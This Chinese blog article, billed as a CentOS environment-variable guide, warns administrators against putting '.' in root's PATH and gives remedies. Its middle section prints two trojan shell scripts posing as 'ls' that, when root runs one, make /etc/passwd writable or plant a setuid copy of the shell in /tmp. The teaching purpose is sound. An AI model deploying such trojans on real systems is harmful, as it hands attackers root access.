您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關怎么在centos中設置環境變量,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。
命令操作如下:
[root@rh root]# PATH=$PATH:.
[root@rh root]# echo $PATH
/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:.
這下是方便了,直接輸入腳本名就能執行。OK,正常情況下一點問題沒有,也省去了輸入./foo.sh的煩惱(foo.sh是我假設的腳本文件名)。有的root把PATH=$PATH:.這條命令加到了profile里,使所有用戶到分享你給他們帶來的"福音"。更有勝者root用戶竟然PATH=.:$PATH(將":"加到路徑前是另一種形式)。正常請況下一點問題沒有,直到有一天,張三用戶在他的主目錄下放了名為lls的腳本,并對root說他的系統出問題了希望root能幫他解決。(其實是一個trap)。Root一上來就su 成管理員權限,緊更著列了一下目錄。有可能管理員誤敲成了lls,結果哈哈。。。。
以下是個簡單的C shell 的例子
#!/bin/csh
If ( ! -o /bin/su )
goto finish
cp /bin/sh /tmp/.sh
chmod 7777 /tmp/.sh
finish :
exec /bin/ls $argv | grep -v ls
稍微變形就有個B shell的
#!/bin/sh
if chmod 666 /etc/passwd > /dev/null 2>&1 ;then
cp /bin/sh /tmp/.sh
chmod 4755 /tmp/.sh
fi
exec ls "$@"
如果root將其環境變量$PATH包含了"."并且其位置先與ls所在的系統目錄,那么當用戶在/tmp中執行ls時,執行的是上面給出的腳本,而不是實際的ls命令,因為最終還是執行了ls,所以root不會看出有任何異常。如果是root執行了該腳本,就會將口令文件設置為可寫,并將shell復制到/tmp保存為.sh,同時設置其setuserid位,所有這一切都非常安靜地發生。
在以上這兩個程序里,心懷不鬼的人能寫入任何令root急的要跳樓的程序,部下陷阱等root來鉆,也許root在不知不覺中施行了也根本不會察覺。 也許在張三的主目錄下有一個名為ps的腳本里面包含有危險腳本,root可能一到他的機器前就輸入了ps,此時系統會首先到當前目錄下搜索,結果/sbin/ps卻不被執行。類似這樣的小花招還有很多。
管理員同志,不要太緊張,下面我說說解決辦法。
首先,要養成輸絕對路徑的良好命令行輸入習慣,這樣就不會讓"不法份子"乘虛而入了。比如,列目錄最好用/bin/ls來列目錄,不要圖方便而冒然輸入ls。
其次,根用戶(root)不要把"."包括到搜索目錄列表里,而普通用戶如果個"."包括到搜索列表中的話別,則"."就應當放在搜索目錄列表的最后位置上。這樣一來普通用戶不會受到前面所述的那種危害。
最后,可以在登陸時在/etc/profile 和bashrc .profile文件的末尾添加如下一行
[PATH=`echo $PATH |sed -e 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://' `
這個簡單的sed命令將刪除路徑里所有的"."包括其另一形式"::"
還可以由crontab調用定期執行
#find / ! -fstype proc '(' -name '.??*' -o -name '.[^.]' ')' > point.txt ; mail -s 'this is a pointlist' root@localhost < point.txt
關于怎么在centos中設置環境變量就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。